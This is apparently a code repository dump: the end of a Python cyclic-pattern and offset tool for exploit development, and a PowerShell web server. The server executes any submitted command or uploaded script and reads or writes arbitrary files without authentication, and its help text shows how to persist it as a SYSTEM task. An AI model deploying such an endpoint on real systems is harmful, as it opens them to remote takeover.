313 | 			while inc < count:
314 | 				position.append(str(inc * 20280 + pos))
315 | 				inc += 1
316 | 			
317 | 			mod = size % 20280
318 | 			if pos + len(offset) <= mod:
319 | 				position.append(str(inc * 20280 + pos))
320 | 			
321 | 			print os.linesep.join(position)
322 | 	except ValueError:
323 | 		offset = decode_offset(offset)
324 | 		show_offset(offset, size)
325 | 
326 | if __name__ == "__main__":
327 | 	if len(sys.argv) == 1:
328 | 		show_help()
329 | 	elif sys.argv[1] != "create" and sys.argv[1] != "offset":
330 | 		show_help()
331 | 	
332 | 	try:
333 | 		try:
334 | 			if sys.argv[1] == "create" and sys.argv[2].isdigit():
335 | 				show_pattern(sys.argv[2])
336 | 		except IndexError:
337 | 			sploit.show_error("You need to supply the <int> value for the create action.")
338 | 		
339 | 		try:
340 | 			if sys.argv[1] == "offset" and sys.argv[2]:
341 | 				try:
342 | 					size = int(sys.argv[3])
343 | 				except IndexError:
344 | 					size = 0
345 | 				
346 | 				show_offset(sys.argv[2], size)
347 | 		except IndexError:
348 | 			sploit.show_error("You need to supply the <str> value for the offset action.")
349 | 	except KeyboardInterrupt:
350 | 		sploit.show_error("Keyboard interrupt received. Educated guess: the script took too long to execute. You used a really long size, didn't you?")
351 | 


--------------------------------------------------------------------------------
/Start-WebServer.ps1:
--------------------------------------------------------------------------------
  1 | <#
  2 | .Synopsis
  3 | Starts powershell webserver
  4 | .Description
  5 | Starts webserver as powershell process.
  6 | Call of the root page (e.g. http://localhost:8080/) returns a powershell execution web form.
  7 | Call of /script uploads a powershell script and executes it (as a function).
  8 | Call of /log returns the webserver logs, /starttime the start time of the webserver, /time the current time.
  9 | /download downloads and /upload uploads a file. /beep generates a sound and /quit or /exit stops the webserver.
 10 | Any other call delivers the static content that fits to the path provided. If the static path is a directory, 
 11 | a file index.htm, index.html, default.htm or default.html in this directory is delivered if present.
 12 | 
 13 | You may have to configure a firewall exception to allow access to the chosen port, e.g. with:
 14 | 	netsh advfirewall firewall add rule name="Powershell Webserver" dir=in action=allow protocol=TCP localport=8080
 15 | 
 16 | After stopping the webserver you should remove the rule, e.g.:
 17 | 	netsh advfirewall firewall delete rule name="Powershell Webserver"
 18 | .Parameter BINDING
 19 | Binding of the webserver
 20 | .Parameter BASEDIR
 21 | Base directory for static content (default: the script's directory)
 22 | .Inputs
 23 | None
 24 | .Outputs
 25 | None
 26 | .Example
 27 | Start-Webserver.ps1
 28 | 
 29 | Starts webserver with binding to http://localhost:8080/
 30 | .Example
 31 | Start-Webserver.ps1 "http://+:8080/"
 32 | 
 33 | Starts webserver with binding to all IP addresses of the system.
 34 | Administrative rights are necessary.
 35 | .Example
 36 | schtasks.exe /Create /TN "Powershell Webserver" /TR "powershell -file C:\Users\Markus\Documents\Start-WebServer.ps1 http://+:8080/" /SC ONSTART /RU SYSTEM /RL HIGHEST /F
 37 | 
 38 | Starts powershell webserver as scheduled task as user local system every time the computer starts (when the
 39 | correct path to the file Start-WebServer.ps1 is given).
 40 | You can start the webserver task manually with
 41 | 	schtasks.exe /Run /TN "Powershell Webserver"
 42 | Delete the webserver task with
 43 | 	schtasks.exe /Delete /TN "Powershell Webserver"
 44 | Scheduled tasks are always running with low priority, so some functions might be slow.
 45 | .Notes
 46 | Version 1.1, 2017-11-23
 47 | Author: Markus Scholtes
 48 | #>
 49 | Param([STRING]$BINDING = 'http://localhost:8080/', [STRING]$BASEDIR = "")
 50 | 
 51 | # No adminstrative permissions are required for a binding to "localhost"
 52 | # $BINDING = 'http://localhost:8080/'
 53 | # Adminstrative permissions are required for a binding to network names or addresses.
 54 | # + takes all requests to the port regardless of name or ip, * only requests that no other listener answers:
 55 | # $BINDING = 'http://+:8080/'
 56 | 
 57 | if ($BASEDIR -eq "")
 58 | {	# retrieve script path as base path for static content
 59 | 	if ($MyInvocation.MyCommand.CommandType -eq "ExternalScript")
 60 | 	{ $BASEDIR = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition }
 61 | 	else # compiled with PS2EXE:
 62 | 	{ $BASEDIR = Split-Path -Parent -Path ([Environment]::GetCommandLineArgs()[0]) }
 63 | }
 64 | # convert to absolute path
 65 | $BASEDIR = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($BASEDIR)
 66 | 
 67 | # MIME hash table for static content
 68 | $MIMEHASH = @{".avi"="video/x-msvideo"; ".crt"="application/x-x509-ca-cert"; ".css"="text/css"; ".der"="application/x-x509-ca-cert"; ".flv"="video/x-flv"; ".gif"="image/gif"; ".htm"="text/html"; ".html"="text/html"; ".ico"="image/x-icon"; ".jar"="application/java-archive"; ".jardiff"="application/x-java-archive-diff"; ".jpeg"="image/jpeg"; ".jpg"="image/jpeg"; ".js"="application/x-javascript"; ".mov"="video/quicktime"; ".mp3"="audio/mpeg"; ".mpeg"="video/mpeg"; ".mpg"="video/mpeg"; ".pdf"="application/pdf"; ".pem"="application/x-x509-ca-cert"; ".pl"="application/x-perl"; ".png"="image/png"; ".rss"="text/xml"; ".shtml"="text/html"; ".swf"="application/x-shockwave-flash"; ".txt"="text/plain"; ".war"="application/java-archive"; ".wmv"="video/x-ms-wmv"; ".xml"="text/xml"}
 69 | 
 70 | # HTML answer templates for specific calls, placeholders !RESULT, !FORMFIELD, !PROMPT are allowed
 71 | $HTMLRESPONSECONTENTS = @{
 72 | 	'GET /'  =  @"
 73 | <html><body>
 74 | 	!HEADERLINE
 75 | 	<pre>!RESULT</pre>
 76 | 	<form method="GET" action="/">
 77 | 	<b>!PROMPT&nbsp;</b><input type="text" maxlength=255 size=80 name="command" value='!FORMFIELD'>
 78 | 	<input type="submit" name="button" value="Enter">
 79 | 	</form>
 80 | </body></html>
 81 | "@
 82 | 	'GET /script'  =  @"
 83 | <html><body>
 84 | 	!HEADERLINE
 85 | 	<form method="POST" enctype="multipart/form-data" action="/script">
 86 | 	<p><b>Script to execute:</b><input type="file" name="filedata"></p>
 87 | 	<b>Parameters:</b><input type="text" maxlength=255 size=80 name="parameter">
 88 | 	<input type="submit" name="button" value="Execute">
 89 | 	</form>
 90 | </body></html>
 91 | "@
 92 | 	'GET /download'  =  @"
 93 | <html><body>
 94 | 	!HEADERLINE
 95 | 	<pre>!RESULT</pre>
 96 | 	<form method="POST" action="/download">
 97 | 	<b>Path to file:</b><input type="text" maxlength=255 size=80 name="filepath" value='!FORMFIELD'>
 98 | 	<input type="submit" name="button" value="Download">
 99 | 	</form>
100 | </body></html>
101 | "@
102 | 	'POST /download'  =  @"
103 | <html><body>
104 | 	!HEADERLINE
105 | 	<pre>!RESULT</pre>
106 | 	<form method="POST" action="/download">
107 | 	<b>Path to file:</b><input type="text" maxlength=255 size=80 name="filepath" value='!FORMFIELD'>
108 | 	<input type="submit" name="button" value="Download">
109 | 	</form>
110 | </body></html>
111 | "@
112 | 	'GET /upload'  =  @"
113 | <html><body>
114 | 	!HEADERLINE
115 | 	<form method="POST" enctype="multipart/form-data" action="/upload">
116 | 	<p><b>File to upload:</b><input type="file" name="filedata"></p>
117 | 	<b>Path to store on webserver:</b><input type="text" maxlength=255 size=80 name="filepath">
118 | 	<input type="submit" name="button" value="Upload">
119 | 	</form>
120 | </body></html>
121 | "@
122 | 	'POST /script' = "<html><body>!HEADERLINE<pre>!RESULT</pre></body></html>"
123 | 	'POST /upload' = "<html><body>!HEADERLINE<pre>!RESULT</pre></body></html>"
124 | 	'GET /exit' = "<html><body>Stopped powershell webserver</body></html>"
125 | 	'GET /quit' = "<html><body>Stopped powershell webserver</body></html>"
126 | 	'GET /log' = "<html><body>!HEADERLINELog of powershell webserver:<br /><pre>!RESULT</pre></body></html>"
127 | 	'GET /starttime' = "<html><body>!HEADERLINEPowershell webserver started at $(Get-Date -Format s)</body></html>"
128 | 	'GET /time' = "<html><body>!HEADERLINECurrent time: !RESULT</body></html>"
129 | 	'GET /beep' = "<html><body>!HEADERLINEBEEP...</body></html>"
130 | }
131 | 
132 | # Set navigation header line for all web pages
133 | $HEADERLINE = "<p><a href='/'>Command execution</a> <a href='/script'>Execute script</a> <a href='/download'>Download file</a> <a href='/upload'>Upload file</a> <a href='/log'>Web logs</a> <a href='/starttime'>Webserver start time</a> <a href='/time'>Current time</a> <a href='/beep'>Beep</a> <a href='/quit'>Stop webserver</a></p>"
134 | 
135 | # Starting the powershell webserver
136 | "$(Get-Date -Format s) Starting powershell webserver..."
137 | $LISTENER = New-Object System.Net.HttpListener
138 | $LISTENER.Prefixes.Add($BINDING)
139 | $LISTENER.Start()
140 | $Error.Clear()
141 | 
142 | try
143 | {
144 | 	"$(Get-Date -Format s) Powershell webserver started."
145 | 	$WEBLOG = "$(Get-Date -Format s) Powershell webserver started.`n"
146 | 	while ($LISTENER.IsListening)
147 | 	{
148 | 		# analyze incoming request
149 | 		$CONTEXT = $LISTENER.GetContext()
150 | 		$REQUEST = $CONTEXT.Request
151 | 		$RESPONSE = $CONTEXT.Response
152 | 		$RESPONSEWRITTEN = $FALSE
153 | 
154 | 		# log to console
155 | 		"$(Get-Date -Format s) $($REQUEST.RemoteEndPoint.Address.ToString()) $($REQUEST.httpMethod) $($REQUEST.Url.PathAndQuery)"
156 | 		# and in log variable
157 | 		$WEBLOG += "$(Get-Date -Format s) $($REQUEST.RemoteEndPoint.Address.ToString()) $($REQUEST.httpMethod) $($REQUEST.Url.PathAndQuery)`n"
158 | 
159 | 		# is there a fixed coding for the request?
160 | 		$RECEIVED = '{0} {1}' -f $REQUEST.httpMethod, $REQUEST.Url.LocalPath
161 | 		$HTMLRESPONSE = $HTMLRESPONSECONTENTS[$RECEIVED]
162 | 		$RESULT = ''
163 | 
164 | 		# check for known commands
165 | 		switch ($RECEIVED)
166 | 		{
167 | 			"GET /"
168 | 			{	# execute command
169 | 				# retrieve GET query string
170 | 				$FORMFIELD = ''
171 | 				$FORMFIELD = [URI]::UnescapeDataString(($REQUEST.Url.Query -replace "\+"," "))
172 | 				# remove fixed form fields out of query string
173 | 				$FORMFIELD = $FORMFIELD -replace "\?command=","" -replace "\?button=enter","" -replace "&command=","" -replace "&button=enter",""
174 | 				# when command is given...
175 | 				if (![STRING]::IsNullOrEmpty($FORMFIELD))
176 | 				{
177 | 					try {
178 | 						# ... execute command
179 | 						$RESULT = Invoke-Expression -EA SilentlyContinue $FORMFIELD 2> $NULL | Out-String
180 | 					}
181 | 					catch	{}
182 | 					if ($Error.Count -gt 0)
183 | 					{ # retrieve error message on error
184 | 						$RESULT += "`nError while executing '$FORMFIELD'`n`n"
185 | 						$RESULT += $Error[0]
186 | 						$Error.Clear()
187 | 					}
188 | 				}
189 | 				# preset form value with command for the caller's convenience
190 | 				$HTMLRESPONSE = $HTMLRESPONSE -replace '!FORMFIELD', $FORMFIELD
191 | 				# insert powershell prompt to form
192 | 				$PROMPT = "PS $PWD>"
193 | 				$HTMLRESPONSE = $HTMLRESPONSE -replace '!PROMPT', $PROMPT
194 | 				break
195 | 			}
196 | 
197 | 			"GET /script"
198 | 			{ # present upload form, nothing to do here
199 | 				break
200 | 			}
201 | 
202 | 			"POST /script"
203 | 			{ # upload and execute script
204 | 
205 | 				# only if there is body data in the request
206 | 				if ($REQUEST.HasEntityBody)
207 | 				{
208 | 					# set default message to error message (since we just stop processing on error)
209 | 					$RESULT = "Received corrupt or incomplete form data"
210 | 
211 | 					# check content type
212 | 					if ($REQUEST.ContentType)
213 | 					{
214 | 						# retrieve boundary marker for header separation
215 | 						$BOUNDARY = $NULL
216 | 						if ($REQUEST.ContentType -match "boundary=(.*);")
217 | 						{	$BOUNDARY = "--" + $MATCHES[1] }
218 | 						else
219 | 						{ # marker might be at the end of the line
220 | 							if ($REQUEST.ContentType -match "boundary=(.*)$")
221 | 							{ $BOUNDARY = "--" + $MATCHES[1] }
222 | 						}
223 | 
224 | 						if ($BOUNDARY)
225 | 						{ # only if header separator was found
226 | 
227 | 							# read complete header (inkl. file data) into string
228 | 							$READER = New-Object System.IO.StreamReader($REQUEST.InputStream, $REQUEST.ContentEncoding)
229 | 							$DATA = $READER.ReadToEnd()
230 | 							$READER.Close()
231 | 							$REQUEST.InputStream.Close()
232 | 
233 | 							$PARAMETERS = ""
234 | 							$SOURCENAME = ""
235 | 
236 | 							# separate headers by boundary string
237 | 							$DATA -replace "$BOUNDARY--\r\n", "$BOUNDARY`r`n--" -split "$BOUNDARY\r\n" | % {
238 | 								# omit leading empty header and end marker header
239 | 								if (($_ -ne "") -and ($_ -ne "--"))
240 | 								{
241 | 									# only if well defined header (separation between meta data and data)
242 | 									if ($_.IndexOf("`r`n`r`n") -gt 0)
243 | 									{
244 | 										# header data before two CRs is meta data
245 | 										# first look for the file in header "filedata"
246 | 										if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "Content-Disposition: form-data; name=(.*);")
247 | 										{
248 | 											$HEADERNAME = $MATCHES[1] -replace '\"'
249 | 											# headername "filedata"?
250 | 											if ($HEADERNAME -eq "filedata")
251 | 											{ # yes, look for source filename
252 | 												if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "filename=(.*)")
253 | 												{ # source filename found
254 | 													$SOURCENAME = $MATCHES[1] -replace "`r`n$" -replace "`r$" -replace '\"'
255 | 													# store content of file in variable
256 | 													$FILEDATA = $_.Substring($_.IndexOf("`r`n`r`n") + 4) -replace "`r`n$"
257 | 												}
258 | 											}
259 | 										}
260 | 										else
261 | 										{ # look for other headers (we need "parameter")
262 | 											if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "Content-Disposition: form-data; name=(.*)")
263 | 											{ # header found
264 | 												$HEADERNAME = $MATCHES[1] -replace '\"'
265 | 												# headername "parameter"?
266 | 												if ($HEADERNAME -eq "parameter")
267 | 												{ # yes, look for paramaters
268 | 													$PARAMETERS = $_.Substring($_.IndexOf("`r`n`r`n") + 4) -replace "`r`n$" -replace "`r$"
269 | 												}
270 | 											}
271 | 										}
272 | 									}
273 | 								}
274 | 							}
275 | 
276 | 							if ($SOURCENAME -ne "")
277 | 							{ # execute only if a source file exists
278 | 
279 | 								$EXECUTE = "function Powershell-WebServer-Func {`n" + $FILEDATA + "`n}`nPowershell-WebServer-Func " + $PARAMETERS
280 | 								try {
281 | 									# ... execute script
282 | 									$RESULT = Invoke-Expression -EA SilentlyContinue $EXECUTE 2> $NULL | Out-String
283 | 								}
284 | 								catch	{}
285 | 								if ($Error.Count -gt 0)
286 | 								{ # retrieve error message on error
287 | 									$RESULT += "`nError while executing script $SOURCENAME`n`n"
288 | 									$RESULT += $Error[0]
289 | 									$Error.Clear()
290 | 								}
291 | 							}
292 | 							else
293 | 							{
294 | 								$RESULT = "No file data received"
295 | 							}
296 | 						}
297 | 					}
298 | 				}
299 | 				else
300 | 				{
301 | 					$RESULT = "No client data received"
302 | 				}
303 | 				break
304 | 			}
305 | 
306 | 			{ $_ -like "* /download" } # GET or POST method are allowed for download page
307 | 			{	# download file
308 | 
309 | 				# is POST data in the request?
310 | 				if ($REQUEST.HasEntityBody)
311 | 				{ # POST request
312 | 					# read complete header into string
313 | 					$READER = New-Object System.IO.StreamReader($REQUEST.InputStream, $REQUEST.ContentEncoding)
314 | 					$DATA = $READER.ReadToEnd()
315 | 					$READER.Close()
316 | 					$REQUEST.InputStream.Close()
317 | 
318 | 					# get headers into hash table
319 | 					$HEADER = @{}
320 | 					$DATA.Split('&') | % { $HEADER.Add([URI]::UnescapeDataString(($_.Split('=')[0] -replace "\+"," ")), [URI]::UnescapeDataString(($_.Split('=')[1] -replace "\+"," "))) }
321 | 
322 | 					# read header 'filepath'
323 | 					$FORMFIELD = $HEADER.Item('filepath')
324 | 					# remove leading and trailing double quotes since Test-Path does not like them
325 | 					$FORMFIELD = $FORMFIELD -replace "^`"","" -replace "`"$",""
326 | 				}
327 | 				else
328 | 				{ # GET request
329 | 
330 | 					# retrieve GET query string
331 | 					$FORMFIELD = ''
332 | 					$FORMFIELD = [URI]::UnescapeDataString(($REQUEST.Url.Query -replace "\+"," "))
333 | 					# remove fixed form fields out of query string
334 | 					$FORMFIELD = $FORMFIELD -replace "\?filepath=","" -replace "\?button=download","" -replace "&filepath=","" -replace "&button=download",""
335 | 					# remove leading and trailing double quotes since Test-Path does not like them
336 | 					$FORMFIELD = $FORMFIELD -replace "^`"","" -replace "`"$",""
337 | 				}
338 | 
339 | 				# when path is given...
340 | 				if (![STRING]::IsNullOrEmpty($FORMFIELD))
341 | 				{ # check if file exists
342 | 					if (Test-Path $FORMFIELD -PathType Leaf)
343 | 					{
344 | 						try {
345 | 							# ... download file
346 | 							$BUFFER = [System.IO.File]::ReadAllBytes($FORMFIELD)
347 | 							$RESPONSE.ContentLength64 = $BUFFER.Length
348 | 							$RESPONSE.SendChunked = $FALSE
349 | 							$RESPONSE.ContentType = "application/octet-stream"
350 | 							$FILENAME = Split-Path -Leaf $FORMFIELD
351 | 							$RESPONSE.AddHeader("Content-Disposition", "attachment; filename=$FILENAME")
352 | 							$RESPONSE.AddHeader("Last-Modified", [IO.File]::GetLastWriteTime($FORMFIELD).ToString('r'))
353 | 							$RESPONSE.AddHeader("Server", "Powershell Webserver/1.1 on ")
354 | 							$RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length)
355 | 							# mark response as already given
356 | 							$RESPONSEWRITTEN = $TRUE
357 | 						}
358 | 						catch	{}
359 | 						if ($Error.Count -gt 0)
360 | 						{ # retrieve error message on error
361 | 							$RESULT += "`nError while downloading '$FORMFIELD'`n`n"
362 | 							$RESULT += $Error[0]
363 | 							$Error.Clear()
364 | 						}
365 | 					}
366 | 					else
367 | 					{
368 | 						# ... file not found
369 | 						$RESULT = "File $FORMFIELD not found"
370 | 					}
371 | 				}
372 | 				# preset form value with file path for the caller's convenience
373 | 				$HTMLRESPONSE = $HTMLRESPONSE -replace '!FORMFIELD', $FORMFIELD
374 | 				break
375 | 			}
376 | 
377 | 			"GET /upload"
378 | 			{ # present upload form, nothing to do here
379 | 				break
380 | 			}
381 | 
382 | 			"POST /upload"
383 | 			{ # upload file
384 | 
385 | 				# only if there is body data in the request
386 | 				if ($REQUEST.HasEntityBody)
387 | 				{
388 | 					# set default message to error message (since we just stop processing on error)
389 | 					$RESULT = "Received corrupt or incomplete form data"
390 | 
391 | 					# check content type
392 | 					if ($REQUEST.ContentType)
393 | 					{
394 | 						# retrieve boundary marker for header separation
395 | 						$BOUNDARY = $NULL
396 | 						if ($REQUEST.ContentType -match "boundary=(.*);")
397 | 						{	$BOUNDARY = "--" + $MATCHES[1] }
398 | 						else
399 | 						{ # marker might be at the end of the line
400 | 							if ($REQUEST.ContentType -match "boundary=(.*)$")
401 | 							{ $BOUNDARY = "--" + $MATCHES[1] }
402 | 						}
403 | 
404 | 						if ($BOUNDARY)
405 | 						{ # only if header separator was found
406 | 
407 | 							# read complete header (inkl. file data) into string
408 | 							$READER = New-Object System.IO.StreamReader($REQUEST.InputStream, $REQUEST.ContentEncoding)
409 | 							$DATA = $READER.ReadToEnd()
410 | 							$READER.Close()
411 | 							$REQUEST.InputStream.Close()
412 | 
413 | 							# variables for filenames
414 | 							$FILENAME = ""
415 | 							$SOURCENAME = ""
416 | 
417 | 							# separate headers by boundary string
418 | 							$DATA -replace "$BOUNDARY--\r\n", "$BOUNDARY`r`n--" -split "$BOUNDARY\r\n" | % {
419 | 								# omit leading empty header and end marker header
420 | 								if (($_ -ne "") -and ($_ -ne "--"))
421 | 								{
422 | 									# only if well defined header (seperation between meta data and data)
423 | 									if ($_.IndexOf("`r`n`r`n") -gt 0)
424 | 									{
425 | 										# header data before two CRs is meta data
426 | 										# first look for the file in header "filedata"
427 | 										if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "Content-Disposition: form-data; name=(.*);")
428 | 										{
429 | 											$HEADERNAME = $MATCHES[1] -replace '\"'
430 | 											# headername "filedata"?
431 | 											if ($HEADERNAME -eq "filedata")
432 | 											{ # yes, look for source filename
433 | 												if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "filename=(.*)")
434 | 												{ # source filename found
435 | 													$SOURCENAME = $MATCHES[1] -replace "`r`n$" -replace "`r$" -replace '\"'
436 | 													# store content of file in variable
437 | 													$FILEDATA = $_.Substring($_.IndexOf("`r`n`r`n") + 4) -replace "`r`n$"
438 | 												}
439 | 											}
440 | 										}
441 | 										else
442 | 										{ # look for other headers (we need "filepath" to know where to store the file)
443 | 											if ($_.Substring(0, $_.IndexOf("`r`n`r`n")) -match "Content-Disposition: form-data; name=(.*)")
444 | 											{ # header found
445 | 												$HEADERNAME = $MATCHES[1] -replace '\"'
446 | 												# headername "filepath"?
447 | 												if ($HEADERNAME -eq "filepath")
448 | 												{ # yes, look for target filename
449 | 													$FILENAME = $_.Substring($_.IndexOf("`r`n`r`n") + 4) -replace "`r`n$" -replace "`r$" -replace '\"'
450 | 												}
451 | 											}
452 | 										}
453 | 									}
454 | 								}
455 | 							}
456 | 
457 | 							if ($FILENAME -ne "")
458 | 							{ # upload only if a targetname is given
459 | 								if ($SOURCENAME -ne "")
460 | 								{ # only upload if source file exists
461 | 
462 | 									# check or construct a valid filename to store
463 | 									$TARGETNAME = ""
464 | 									# if filename is a container name, add source filename to it
465 | 									if (Test-Path $FILENAME -PathType Container)
466 | 									{
467 | 										$TARGETNAME = Join-Path $FILENAME -ChildPath $(Split-Path $SOURCENAME -Leaf)
468 | 									} else {
469 | 										# try name in the header
470 | 										$TARGETNAME = $FILENAME
471 | 									}
472 | 
473 | 									try {
474 | 										# ... save file with the same encoding as received
475 | 										[IO.File]::WriteAllText($TARGETNAME, $FILEDATA, $REQUEST.ContentEncoding)
476 | 									}
477 | 									catch	{}
478 | 									if ($Error.Count -gt 0)
479 | 									{ # retrieve error message on error
480 | 										$RESULT += "`nError saving '$TARGETNAME'`n`n"
481 | 										$RESULT += $Error[0]
482 | 										$Error.Clear()
483 | 									}
484 | 									else
485 | 									{ # success
486 | 										$RESULT = "File $SOURCENAME successfully uploaded as $TARGETNAME"
487 | 									}
488 | 								}
489 | 								else
490 | 								{
491 | 									$RESULT = "No file data received"
492 | 								}
493 | 							}
494 | 							else
495 | 							{
496 | 								$RESULT = "Missing target file name"
497 | 							}
498 | 						}
499 | 					}
500 | 				}
501 | 				else
502 | 				{
503 | 					$RESULT = "No client data received"
504 | 				}
505 | 				break
506 | 			}
507 | 
508 | 			"GET /log"
509 | 			{ # return the webserver log (stored in log variable)
510 | 				$RESULT = $WEBLOG
511 | 				break
512 | 			}
513 | 
514 | 			"GET /time"
515 | 			{ # return current time
516 | 				$RESULT = Get-Date -Format s
517 | 				break
518 | 			}
519 | 
520 | 			"GET /starttime"
521 | 			{ # return start time of the powershell webserver (already contained in $HTMLRESPONSE, nothing to do here)
522 | 				break
523 | 			}
524 | 
525 | 			"GET /beep"
526 | 			{ # Beep
527 | 				[CONSOLE]::beep(800, 300) # or "`a" or [char]7
528 | 				break
529 | 			}
530 | 
531 | 			"GET /quit"
532 | 			{ # stop powershell webserver, nothing to do here
533 | 				break
534 | 			}
535 | 
536 | 			"GET /exit"
537 | 			{ # stop powershell webserver, nothing to do here
538 | 				break
539 | 			}
540 | 
541 | 			default
542 | 			{	# unknown command, check if path to file
543 | 
544 | 				# create physical path based upon the base dir and url
545 | 				$CHECKDIR = $BASEDIR.TrimEnd("/\") + $REQUEST.Url.LocalPath
546 | 				$CHECKFILE = ""
547 | 				if (Test-Path $CHECKDIR -PathType Container)
548 | 				{ # physical path is a directory 
549 | 					$IDXLIST = "/index.htm", "/index.html", "/default.htm", "/default.html"
550 | 					foreach ($IDXNAME in $IDXLIST)
551 | 					{ # check if an index file is present
552 | 						$CHECKFILE = $CHECKDIR.TrimEnd("/\") + $IDXNAME
553 | 						if (Test-Path $CHECKFILE -PathType Leaf)
554 | 						{ # index file found, path now in $CHECKFILE
555 | 							break
556 | 						}
557 | 						$CHECKFILE = ""
558 | 					}
559 | 				}
560 | 				else
561 | 					{ # no directory, check for file
562 | 						if (Test-Path $CHECKDIR -PathType Leaf)
563 | 						{ # file found, path now in $CHECKFILE
564 | 							$CHECKFILE = $CHECKDIR
565 | 						}
566 | 					}
567 | 
568 | 				if ($CHECKFILE -ne "")
569 | 				{ # static content available
570 | 					try {
571 | 						# ... serve static content
572 | 						$BUFFER = [System.IO.File]::ReadAllBytes($CHECKFILE)
573 | 						$RESPONSE.ContentLength64 = $BUFFER.Length
574 | 						$RESPONSE.SendChunked = $FALSE
575 | 						$EXTENSION = [IO.Path]::GetExtension($CHECKFILE)
576 | 						if ($MIMEHASH.ContainsKey($EXTENSION))
577 | 						{ # known mime type for this file's extension available
578 | 							$RESPONSE.ContentType = $MIMEHASH.Item($EXTENSION)
579 | 						}
580 | 						else
581 | 						{ # no, serve as binary download
582 | 							$RESPONSE.ContentType = "application/octet-stream"
583 | 							$FILENAME = Split-Path -Leaf $CHECKFILE
584 | 							$RESPONSE.AddHeader("Content-Disposition", "attachment; filename=$FILENAME")
585 | 						}
586 | 						$RESPONSE.AddHeader("Last-Modified", [IO.File]::GetLastWriteTime($CHECKFILE).ToString('r'))
587 | 						$RESPONSE.AddHeader("Server", "Powershell Webserver/1.1 on ")
588 | 						$RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length)
589 | 						# mark response as already given
590 | 						$RESPONSEWRITTEN = $TRUE
591 | 					}
592 | 					catch	{}
593 | 					if ($Error.Count -gt 0)
594 | 					{ # retrieve error message on error
595 | 						$RESULT += "`nError while downloading '$CHECKFILE'`n`n"
596 | 						$RESULT += $Error[0]
597 | 						$Error.Clear()
598 | 					}
599 | 				}
600 | 				else
601 | 				{	# no file to serve found, return error
602 | 					$RESPONSE.StatusCode = 404
603 | 					$HTMLRESPONSE = '<html><body>Page not found</body></html>'
604 | 				}
605 | 			}
606 | 
607 | 		}
608 | 
609 | 		# only send response if not already done
610 | 		if (!$RESPONSEWRITTEN)
611 | 		{
612 | 			# insert header line string into HTML template
613 | 			$HTMLRESPONSE = $HTMLRESPONSE -replace '!HEADERLINE', $HEADERLINE
614 | 
615 | 			# insert result string into HTML template
616 | 			$HTMLRESPONSE = $HTMLRESPONSE -replace '!RESULT', $RESULT
617 | 
618 | 			# return HTML answer to caller
619 | 			$BUFFER = [Text.Encoding]::UTF8.GetBytes($HTMLRESPONSE)
620 | 			$RESPONSE.ContentLength64 = $BUFFER.Length
621 | 			$RESPONSE.AddHeader("Last-Modified", [DATETIME]::Now.ToString('r'))
622 | 			$RESPONSE.AddHeader("Server", "Powershell Webserver/1.1 on ")
623 | 			$RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length)
624 | 		}
625 | 
626 | 		# and finish answer to client
627 | 		$RESPONSE.Close()
628 | 
629 | 		# received command to stop webserver?
630 | 		if ($RECEIVED -eq 'GET /exit' -or $RECEIVED -eq 'GET /quit')
631 | 		{ # then break out of while loop
632 | 			"$(Get-Date -Format s) Stopping powershell webserver..."
633 | 			break;
634 | 		}
635 | 	}
636 | }
637 | finally
638 | {
639 | 	# Stop powershell webserver
640 | 	$LISTENER.Stop()
641 | 	$LISTENER.Close()
642 | 	"$(Get-Date -Format s) Powershell webserver stopped."
643 | }
644 | 


--------------------------------------------------------------------------------